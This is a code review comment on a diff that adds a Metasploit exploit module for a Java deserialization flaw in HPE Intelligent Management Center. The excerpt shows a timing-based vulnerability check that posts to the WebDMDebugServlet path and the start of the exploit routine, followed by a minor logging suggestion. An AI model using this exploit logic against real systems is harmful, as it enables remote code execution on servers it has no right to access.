modules/exploits/windows/http/hp_imc_java_deserialize.rb

```diff
@@ -0,0 +1,137 @@
+
+    print_status 'Attempting to verify vulnerability by sending synchronous sleep command...'
+    t1 = Time.now.to_i
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'topo', 'WebDMDebugServlet'),
+      'data'     => data
+    })
+    t2 = Time.now.to_i
+
+    diff = t2 - t1
+    if res && res.code == 500 && res.body.include?('HPE Intelligent Management Center') && diff >= 10
+      print_good("Response received after #{diff} seconds.")
+      return CheckCode::Vulnerable
+    else
+      return CheckCode::Appears
+    end
+
+    CheckCode::Detected
+  end
+
+  def exploit
+    data = set_payload
+
+    print_status 'Sending serialized Java object...'
```

Comment:
`data` is defined above, but only used once. May as well use it again here:

```suggestion
    print_status "Sending serialized Java object (#{data.length} bytes)..."
```